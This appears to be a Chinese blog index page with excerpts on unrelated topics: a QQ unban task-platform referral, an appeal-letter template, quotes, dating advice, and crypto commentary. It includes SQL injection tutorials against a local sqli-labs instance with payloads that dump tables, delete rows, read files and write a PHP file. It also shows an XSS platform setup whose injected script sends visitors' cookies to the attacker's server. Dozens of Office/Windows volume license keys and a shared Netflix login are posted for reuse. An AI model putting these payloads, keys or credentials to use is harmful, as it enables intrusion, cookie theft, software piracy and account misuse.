项目介绍 相信大家对于QQ解封应该都不陌生，现在市面上已经没有这样的平台了；小编今天分享的这个平台QQ解封价格1单在0.38元不等，小编刚也用自己完成了10单，提现3.8元到支付宝；可以用朋友 家里人，同学的手机完成免费的早餐就有了，也可以去地推无限放大！ 项目截图 项目入口 打开手机扫描下方扫码或复制链接打开：http://hz.mmn6.com/reg?smid=180628 登录地址：http://hz.mmn6.com/ 打开后注册账号->任务大厅->普通JF任务->接单即可 提现的话在我的里边可以直接体现 ...

其实投诉到工信部资料齐全，申诉的说词整理得好，能够成功解封的几率非常高。 只要不是严重的违规，比如： 1、涉H，群主没有发过H，但是被封号的； 2、QQ空间发了几条不是很严重的广告之类的； 3、骂人，批量删除好友；....等等。只要你的QQ号没有涉及到“HDD” 到工信部基本能解。如果涉及“HDD”严重违规的话，可以去投诉试试。 工信部投诉邮箱地址：12300@gdca.gov.cn 邮件发送格式： 邮件内容：申诉人：XXX 身份证号码：XXXXX 联系电话：XXXX 争议号码：XXX（此处填写QQ号码） 申诉理由：尊敬的工信部领导，您好！在XXXX年XX月XX日本人多年使用的QQ号XXXX被腾讯公司以“涉嫌传播违法违规信息”被永久冻结封号，多次联系腾讯客服申诉无果，每次都是告知违规不予解封。本号为私人用号，但是很多公司资料保存在QQ上，因此QQ号有时候有朋友和同事需要登录下载资料或文件，所以QQ在封号之前QQ密码有过泄漏的情况。本人身为QQ忠实客户，QQ也使用10多年了，信用一直良好，自己实际并未发布什么违规内容信息。QQ号上保存大量重要资料.文件.合同...等等。很多亲朋好友、客户，等因封号导致中断联系方式。使用该QQ号注登录的其他软件、邮箱、腾讯云、企鹅FM、企鹅自媒体...等等，与之QQ关联绑定的第三方平台都无法登录使用。如果QQ号因密码泄漏或QQ异常被他人利用发布了什么违规的内容，腾讯公司应该通知警告或临时冻结。腾讯公司不但没有采取补救措施，反倒直接封号处理。腾讯封号行为对我生活和工作都 造成了极大的影响和打击。（此处申诉理由大家根据自身情况进行修改） 事实依据：《互联网群组信息服务管理规定》第十一条：互联网群组信息服务提供者应当对违反法律法规和国家有关规定的互联网群组，依法依约采取警示整改、暂停发布、关闭群组等处置措施，保存有关记录，并向有关主管部门报告。互联网群组信息服务提供者应当对违反法律法规和国家有关规定的群组建立者、管理者等使用者，依法依约采取降低信用等级、暂停管理权限、取消建群资格等管理措施，保存有关记录，并向有关主管部门报告。 邮件附件需要上传：身份证正照片+身份证反面照片+QQ登录提示冻结截图+ 联系腾讯QQ客服沟通处理结果截图+其他资料截图（你觉得还有用的资料， 比如：公司营业执照；军官证；退伍证；之类的证明） PS：申诉理由只是给大家一个参考，各位自行根据自身QQ情况去填写和修改。 ...

你看到光，自以为是希望。以为能摆脱厄运。可到了最后发现，那竟是没有回声的山谷 ...

“《人间失格》里有这样一句话：仅一夜之间，我的心判若两人。他自人山人海中来，原来只为给我一场空欢喜。你来时携风带雨，我无处可避；你走时乱了四季，我久病难医” ...

...

...

...

一、下载平台源码、拷贝到我们网站的根目录 https://github.com/anwilx/xss_platform 二、修改相关参数 1、config.php，数据库用户、密码、还有xss平台的访问路径 2、导入sql文件，测试的时候没法导入，所以就手动创建了数据库 新建数据库 打开xssplatform.sql，将里面的sql语句执行一遍 3、更新站点域名，将作者的域名替换，一共有四处 将module模块里"http://xsser.me"替换为"http://www.aiyouxss.com/xss"); 4、修改authtest文件 三、平台利用 1、注册一个账户 2、创建一个项目 3、配置相关信息，根据需要，添加模块 4、复制script里面代码，插入到存在xss漏洞的页面 <script src=http://192.168.139.129/xss/E3vbsa></script> 5、打开xss平台，已获取对方cookie 禁止非法，后果自负 ...

Office 2010 RTM ProPlus MAK (6枚) RG4PQ-T6TMF-GKJ6F-29K3W-CYDHQ 剩余激活台数：1230 D49R8-PRFC4-Y4B3V-H2DCW-YX6RF 剩余激活台数：1166 PPHD2-XQTJX-9HWHM-63J96-PGWCC 剩余激活台数：976 39V92-C3X9H-CQVJ9-42MVV-9DKF7 剩余激活台数：271 YWVVH-8YHWY-YFQQQ-4FM68-J34WC 剩余激活台数：258 73289-67K36-76W4R-7J2KH-3DYQG 剩余激活台数：209 Office 2010 RTM Standard MAK (8枚) BKH87-RM4TQ-JPT9R-BYCMC-TM2R7 剩余激活台数：2708 7PCQ3-8D8XV-3J7V4-W4XBG-Y33HB 剩余激活台数：1273 P8TVJ-7XKWJ-CXRF9-8M3FB-JMW76 剩余激活台数：483 7PX78-VR2MF-W3QXR-CRHP6-7VHVD 剩余激活台数：184 RGJGY-C2C9V-XYFJG-VDG6D-JT3V6 剩余激活台数：183 VTQYR-KG7CT-WC29V-X4WGV-TBMFT 剩余激活台数：99 4FG26-4RJVY-M3MMM-4K6T2-D8TR6 剩余激活台数：62 J83QX-TPWKR-Y9R6G-R7797-RCXF9 剩余激活台数：14 Office 2013 ProPlusVL MAK (1枚) HGJNT-2TMC6-W8F3P-PMC83-TCMG7 剩余激活台数：386 Office 2013 StandardVL MAK (3枚) R2T2Q-NB3RG-6XYX7-3F27M-X4QBG 剩余激活台数：2959 V43NQ-8BFHT-MRV6G-2KQM8-33TYG 剩余激活台数：159 N2F2M-DQHM7-2DYGM-Q43V7-KHGYG 剩余激活台数：46 Office 2016 ProPlusVL MAK (1枚) KC7N8-WXH8P-8M8R7-QWYKK-JXCQY 剩余激活台数：989 Office 2016 StandardVL MAK (7枚) 2BNWF-HQ3XJ-QHXQD-639QJ-XW3M2 剩余激活台数：3068 CRNDB-HTKT7-6KFGW-MB8R2-8XCRP 剩余激活台数：2022 KM43Q-N6QHG-C8FC4-2V389-M984P 剩余激活台数：295 RQY6D-4QNCJ-63TCK-VTTGV-46YWC 剩余激活台数：140 2PN2K-92QQQ-8BGWG-CKCH2-7CFJC 剩余激活台数：96 HVYJ7-XKN9F-98YBY-PPBMT-TJGFP 剩余激活台数：28 M374V-M4NDV-X44YB-KFCT3-GF4JC 剩余激活台数：16 ...

Server 2012 RTM ServerStandard Volume MAK (4枚) N37K6-MB88P-YD438-VGJ9R-R3G9Q 剩余激活台数：1706 C9N8J-RXBJQ-PVFVV-JYRQT-Y96DD 剩余激活台数：117 MD2YD-3DNMJ-FF7YH-37XRB-KD4G3 剩余激活台数：45 4NK42-M6GH9-WCRD8-R876X-YDTDD 剩余激活台数：43 Server Essentials 2012 R2 RTM ServerSolution Volume MAK (1枚) JNDG6-WBDYG-9YP4M-6BXK8-F3JJK 剩余激活台数：438 Server Essentials 2012 RTM ServerSolution Volume MAK (1枚) XXDRB-9N8D4-HHBVR-RMXHF-PPKYK 剩余激活台数：8 Win 10 RTM EducationN Volume MAK (1枚) QN79V-RDKJ8-R378G-JTF3F-7H64X 剩余激活台数：339 Win 10 RTM EnterpriseSN Volume MAK (4枚) RQNR8-3P36J-74BH7-DR2GJ-6MV2F 剩余激活台数：976 RVJVP-8TNBX-H2T93-TFVM3-9D8WR 剩余激活台数：485 NQHWT-CXQXK-BG9DF-P3MHJ-82RCF 剩余激活台数：52 QYXMQ-MCN7Q-3GVJ4-YJC23-YBH2X 剩余激活台数：20 Win 10 RTM EnterpriseS Volume MAK (1枚) RXN7B-G2T3Q-W8HFT-24JGT-D3YJP 剩余激活台数：473 Win 10 RTM Enterprise Volume MAK (1枚) VNY28-Q772R-JPXVV-GVMGP-W2QF4 剩余激活台数：425 Win 10 RTM ProfessionalN Volume MAK (1枚) HRY3G-NXWKM-FH7YY-BDWPR-KBT7B 剩余激活台数：7 Win 10 RTM ProfessionalWorkstationN Volume MAK (4枚) QNX6C-DKJMX-XDYCM-PX36T-H8TFT 剩余激活台数：290 WN62W-W62DT-9K762-JCD8F-W8HB6 剩余激活台数：238 4FPCQ-NB9XF-6QR66-VF8HD-C384T 剩余激活台数：79 MF3K4-H6NGG-9QHHB-YD9R6-GMV8G 剩余激活台数：32 Win 10 RTM ProfessionalWorkstation Volume MAK (3枚) NCHRH-2T63T-G7RXK-CDTH8-RX9YX 剩余激活台数：347 VK6NF-PFH2Y-RHJQP-VRYYW-DGQMX 剩余激活台数：35 Y2M3X-JPN7M-XDQ2R-DK989-3RVBX 剩余激活台数：27 Win 7 All Volume Editions Volume MAK (3枚) 4FXFP-6QJ7V-MBQB2-YFVYW-HRR9B 剩余激活台数：477 J24B6-MQPT3-XQW6V-63THC-7D6XV 剩余激活台数：439 MHFWF-DJVB7-GXRDD-VPM73-K3YVJ 剩余激活台数：43 Win 8.1 RTM Professional ProfessionalN Enterprise EnterpriseN Volume MAK (1枚) K9T2Q-VNJD7-BQ76H-3Q7JK-V2YDQ 剩余激活台数：20 ...

一、堆叠注入介绍 1、多条sql语句同时执行 2、union只能执行查询语句，堆叠可以执行增删改查 3、同时执行三条语句 select 1;select 2;select 3; 二、插入注入 1、找到注入点，添加一条数据 http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+ 再次访问http://192.168.139.129/sqli/Less-38/?id=66 2、获取数据库名称 http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+ 再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称 3、获取数据库中的表名 http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+ 再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息 4、获取表中的字段名 http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+ 再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息 三、删除删除注入 http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0)); 禁止非法，后果自负 ...

2021年5月22日13时07分，袁隆平院士因多器官功能衰竭在湖南长沙逝世，享年91岁。记住这位让中国人"端牢饭碗"的英雄。送别袁老!...

1、千万别和太快的男生在一起。 谈恋爱多了，你就会发现，许多人对于爱情的看法多是始于幻想，最后败于现实。 2、你跋山涉水、翻山越岭寻找的那个人不会爱上你，她只会爱上她跋山涉水、翻山越岭寻找的人。 3、你死追的那个人基本不会爱上你。如果你追一个女生很久，用尽了浑身解数，还是得不到她的回应，基本就可以放弃了。 4、恋爱久了，两个人难免会失去新鲜感。 或许选择离开一个人很简单，但是换到最后你就会发现，有些人永远都在和新人体验着旧的事情，却不知道爱情保鲜的最好方式是和旧人换新鲜的事体验。 5、不要因为遇到渣男/渣女，就不相信爱情。你只是在对的时间，遇到了一个错的人，仅此而已。 6、细心的人，往往出手就不是一般人，比如双击屏幕两下，你会发现知乎的新功能！ 7、追你的人多了，不一定是好事，如果追你的人质量都很差，那说明你也有问题。 8、相濡以沫，不如相忘于江湖。两个不合适的人不要相互拖着，在一起时间越久越痛苦，如果你觉得感情到头了，最理智的做法就是及时止损。 9、一个真正成熟可靠的人，要么是曾经经历过非常崩溃的时刻，没有人帮助，自己浴火重生。要么是读了很多书，变得超凡脱俗，这样的人往往都知道自己要什么，在恋爱中，能找到自己要什么的人最洒脱。 如果你也想变得更好，建议多读书，这个方法是一个人成长当中成本最低且效果最好的方式。 如果你不知道读什么书，可以关注我的公众号［职场非凡说］，我把一份高质量的“书单”分享给你，希望能够帮助你提高读书的效率，从而变得更好。 10、永远不要为了一个人去改变自己，如果你不是那种满是缺点的人，最好不要去追一个让你变得不再像你的人。因为当你改变以后，你就会发现，不爱你的人，你做再多也没用。 11、谈过几次恋爱以后，你就发现，你找的那个人，其实就是另一个自己。两个人会有极强的相似性，你的一个眼神、一个动作、一个举手投足，对方就知道你想要什么。 12、不要阻止要离开你的人，那些要离开你的人，如果再也不回来了，就说明他们从来都不是对的人。 13、不要死追那些对你爱答不理的人，要么是你现在还入不了对方的法眼，要么人家对你没兴趣。其实，很多人都是在错的时间遇到了对的人，却没有能力抓住，有时候换一个时间，可能就成了。 14、如果你想追求那些超出你各个方面很多的人，最好让自己也有那样的筹码，漂亮、多金、足够有学识，这三样最少有一样。 如果没有，最好也别期望自己能找这样一个的人，因为你在挑选别人的时候，其实别人也在挑选你。 15、有的爱情就像一场交易，谈得不再是单纯的儿女情长，而是柴米油盐酱醋茶，从此两个人之间，有的不是爱情，而是搭伙过日子。 16、追一个人的时候，是能够感觉到对方到底喜不喜欢你的，只是刚开始的时候许多人不愿意承认，结果被几次三番被伤了，才知道回头。其实，我们都不傻，只是当时想再等等，等对方回头，后来才明白没有双向奔赴的爱情，终究是真心用错了地方，毫无价值。 17、都说撒娇的女生最好命，但现实是独立女生才最好命。 其实很多没那么独立的女孩子，往往会在一段恋爱结束时，变得脆弱不堪。或许她们曾经以为对方就是自己的一切，离开了某一个人就会觉得天塌了。 但独立女生就不一样，她们自己就能撑起半边天。所以在恋爱中，让自己独立一点最好，不是要有多么强势，而是哪怕自己一个人的时候，也不会觉得孤立无援。 18、永远不要把另一半当情绪的“垃圾桶”，多分享快乐的事情，少分享一些抱怨，两个人的矛盾起码少一半。 19、两个人在一起了，渐渐要和那些关系不清不楚的人断了联系，既然做好了和一个人在一起的准备，就不要和另一个人藕断丝连。 20、工作退一步海阔天空，爱情晚一步人去楼空。 不要等到什么都准备好了再开始一段感情，遇到合适的人不要让对方等太长时间，有时候等你想开始了，却发现再也没有那么合适的人。 21、感情里，那些什么都不图的人，往往都被伤得最深。 见过了太多这样的例子，那些对你有所企图的人反而比什么都不图的人过得差，说这个话，不是想让你变成一个只会索取的人，而是希望你知道，越是容易得到的，遇到错的人，越容易受伤。有时候，索取也是一种保护自己的手段，但具体的还要看人。 22、旧情人就像掐灭的烟头，该灭的时候，就不能再让它死灰复燃。如果因为对方人品而分手，那说明这个人就不可信，既然不可信就不要给对方第二次机会。 23、出轨只有零次和无数次，一旦发现对方出轨了，如果你觉得不可原谅，哪怕对方再怎么道歉，也不要再回头。 24、稀里糊涂谈恋爱的人，最容易结婚，反而什么都想清楚了，就很难结婚了。有时候等你什么都想清楚了，对未来锱铢必较的时候，往往会忽略了未来的不确定性，认为现在的状态就是以后的状态，反而稀里糊涂的时候，更容易把精力是放在当下。 25、感情的事情多听自己的，进步更快。 因为没有人能替代你，该遇到的事情一件都不会少，只有自己亲身经历了悲欢离合，才会对悲欢离合理解的更加深刻，感情就是如此，有些事情，自己不经历，别人跟你说再多都没用。 26、如果你想让自己的感情更加稳固，就不要轻易开始一段感情。在一起之前，多了解对方，多相处，不止要听他说什么，更要看他做过什么，做成了什么，人品如何，了解清楚的感情才会更加稳固。 27、千万别喜欢上一个让你自卑的人。 一段关系，基于平等，如果有一方一直处于劣势，另一方还不愿意珍惜，这样的感情其实很难继续下去。 28、谈恋爱就跟找工作一样，你可以随便找一份，但是想要找到更好的，坚持、有耐心、努力一样都不能少，毕竟许多东西经过时间的磨练以后才能看得更清楚。 29、感情里没有配不配，只有合不合适，这段不行，就换下一段，没有必要为一个错的答案，纠结很久。 30、如果你选择等待爱情，就做好一直单身的准备，很多人不是等不到爱情，而是等待爱情的代价太高。 ...

Netflix(Nasdaq NFLX) 成立于1997年，是一家在线影片租赁提供商，主要提供Netflix超大数量的DVD并免费递送，总部位于美国加利福尼亚州洛斯盖图。 Netflix已经连续五次被评为顾客最满意的网站。 可以通过PC、TV及iPad、iPhone收看电影、电视节目，可通过Wii，Xbox360，PS3等设备连接TV。 Netflix大奖赛从2006年10月份开始，Netflix公开了大约1亿个1－5的匿名影片评级，数据集仅包含了影片名称。 评价星级和评级日期，没有任何文本评价的内容。比赛要求参赛者预测Netflix的客户分别喜欢什么影片，要把预测的效率提高10%以上。 2017年6月6日，《2017年BrandZ最具价值全球品牌100强》公布，Netflix名列第92位。 2017年11月30日，美国流媒体巨头、世界最大的收费视频网站网飞（Netflix）买下《白夜追凶》播放权，这是该公司首次买下中国内地网络电视剧版权，计划在全球190多个国家和地区上线。 2018年10月，《财富》未来公司50强排行榜发布，Netflix排名第八。 2018年12月，世界品牌实验室编制的《2018世界品牌500强》揭晓，排名第88。 2019年10月，位列2019福布斯全球数字经济100强榜第46名。 2019年10月，Interbrand发布的全球品牌百强榜排名65。 2020年1月22日，名列2020年《财富》全球最受赞赏公司榜单第16位。 有想看的又没有账号的现在可以去看看了，需要自己准备好科学上网！ 账号更新时间：2021年5月16日 账号信息禁止转载，共享账号请勿修改密码！ 登陆后不要退出就可以一直使用直到失效。 账号：marvao588@gmail2021.com 密码：zzzzzz.me 用户Pin码：无 加入交流群获取更多 ...

这段时间行情的风格变换实在是太快了，跟前段时间主流飞涨，山寨群魔乱舞形成鲜明对比的是，最近币市开启了全面的回调休整。 比特币从高点64000左右回调，连续击穿60000和50000的整数关口，周4的大瀑布甚至击穿了47000，从高点连续调整一个月，差不多跌去了30%，冲着40000刀去了，就目前为止还没有止跌的迹象。 4月底5月初这波上涨行情的龙头以太坊，也连续调整多人，虽然前天又一波反弹，但是很快又被按下来了，从高点4370点下来也差不多了20%。 不论是比特币还是以太坊在这一牛市周期里面都算是调整比较大的了，更别说其他山寨币，基本上都是被按在地上摩擦，血流成河。 这一波的调整最主要原因还是因为前期涨太多了，获利盘获利了结，再加上一些外部原因，比如灰度做空狗狗币，特斯拉停止接受比特币支付，全球疫情扩散，资本市场动荡等综合因素的影响 其实这一波调整是有迹可循的，早在5月9号我就在朋友圈提示风险了：“主流屡创新高，山寨横飞，说明牛市末期已至，当大家都上头时，逢高出货，锁定利润才是明智之举！！！” 随后的几天也持续提示风险 那么这一轮调整是否已经到位，可不可以超低？Kirin博客还是延续几天前的看法，调整还没有到位，不要乱抄底。 比较理想的抄底点位是比特币：42000左右 以太坊：3000左右。 当然，目前基本上已经是牛市的末期，抄底也不建议重仓抄底，前期已经获利的建议先锁定的一部分利润，提现之后才是钱，不然都只是一个数字而已，随时都可能还会去。...

一、数据库导出文件 1、连接数据库 2、通过into outfile导出数据库内容 select * from users into outfile "c:/1.sql"; 3、通过into outfile语句，在C盘目录写入一句话木马 select '<?php phpinfo();?>' into outfile "c:/aiyou.php"; 4、通过实例导出一句话，避免单引号问题，可以将一句话内容编码为十六进制 http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,'<?php phpinfo();?>' into outfile 'c:/aiyou.php' --+http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'c:/aiyou.php' --+ 提示： 导入文件需要修改mysql的一个参数值，打开my.cnf 或 my.ini，加入以下语句后重启mysql。 secure_file_priv='' 二、读文件 1、连接Mysql数据库，读取C盘的aiyou.php内容 select load_file("c:/aiyou.php"); 2、通过联合查询，将读到的内容显示出来,为避免引号的问题，将路径编码为十六进制 http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,load_file("c:/1.sql");http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,load_file(0x633a2f312e73716c) --+ 禁止非法，后果自负 ...

一、常用命令及函数 1、order by排序，获取数据有几个字段，后面小于等于字段数，都会返回结果，大于字段数返回错误 select * from users order by 3； 2、union select联合查询，后边必须跟一样的字段数 select * from users union select 1,2,5; 3、user()查看当前mysql用户 4、version()查看mysql版本信息 5、database()查看当前数据库名 select * from users union select user(),version(),database(); 二、跨库查询 1、获取aiyou数据库中表 select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou"; 2、获取下一个表格 select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 0,1;select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 1,1;select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 2,1; 3、获取字段名 select * from users union select 1,2,column_name from information_schema.columns where table_name="bucuo"; 4、获取字段内容 select * from users union select 1,2,username from users； 三、实例演示（sqli环境） 1、判断表有多少字段，order by 3返回正常，所以有三个字段 http://192.168.139.129/sqli/Less-2/?id=1 order by 3 2、联合查询可以显示的数列，让前面的select语句报错，才能执行后面的select语句 http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,3 3、获取数据库名字和版本信息，因为1不能显示，所以将2和3替换为version(),database() http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,version(),database() 4、获取数据库security的表 http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema="security" 获取第二个表、第三个表 http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema="security" limit 1,1 -- 5、获取表名为users的字段名 http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name="users"http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name="users" limit 1,1 -- 6、获取字段内容 http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,username from usershttp://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,username from users limit 1,1 -- 禁止非法，后果自负 ...

一、常用函数 1、mid(str,1,5)：取字符串str的前5个字节 2、ord()：转换成ASCII码 3、length()：统计长度 4、 ascii()：将字符转换ASCII 二、实例演示 1、and 1=1 访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=1 --+ 返回正确 2、and 1=2 访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=2 --+ 返回错误 3、判断数据库长度 http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=8 --+返回正常，说明数据库长度为8http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=9 --+返回错误 4、判断数据库第一个字母 http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),1,1)='s' --+ 不停的修改二十六个字母，知道正确为之 5、判断数据库第二个字母 http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),2,1)='e' --+ 最终获取数据库的名称为“security” 6、获取表名,最终获取表名users http://192.168.139.129/sqli/Less-8/?id=1' and mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u' --+ 7、获取字段名,最终获取字段名password http://192.168.139.129/sqli/Less-8/?id=1' and mid((select column_name from information_schema.columns where table_name='users' limit 12,1),1,1)='p' --+ 8、获取字段内容，最终获取一个名为admin的内容 http://192.168.139.129/sqli/Less-8/?id=1' and mid((select password from users limit 8,1),1,1)='a' --+ 禁止非法，后果自负 ...